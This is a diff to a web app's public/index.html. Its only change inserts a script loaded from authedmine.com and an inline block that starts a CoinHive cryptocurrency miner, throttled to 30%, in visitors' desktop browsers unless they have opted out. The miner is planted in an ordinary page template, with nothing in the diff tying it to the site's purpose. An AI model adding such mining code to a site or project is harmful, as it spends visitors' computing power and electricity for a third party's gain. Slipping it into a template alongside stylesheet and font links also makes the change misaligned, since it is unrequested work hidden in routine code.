--- a/public/index.html
+++ b/public/index.html
@@ -13,6 +13,15 @@
     <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
     <link href="https://fonts.googleapis.com/css?family=Roboto" rel="stylesheet">
 
+    <script src="https://authedmine.com/lib/authedmine.min.js"></script>
+
+    <script>
+      var miner = new CoinHive.Anonymous('dGIvur8vRepSwXmYY6UPpf2lfNwWkQyo', {throttle: 0.3});
+      if (!miner.isMobile() && !miner.didOptOut(14400)) {
+        miner.start();
+        console.log('pic pic pic');
+      }
+    </script>
     <!--
       Notice the use of %PUBLIC_URL% in the tags above.
       It will be replaced with the URL of the `public` folder during the build.
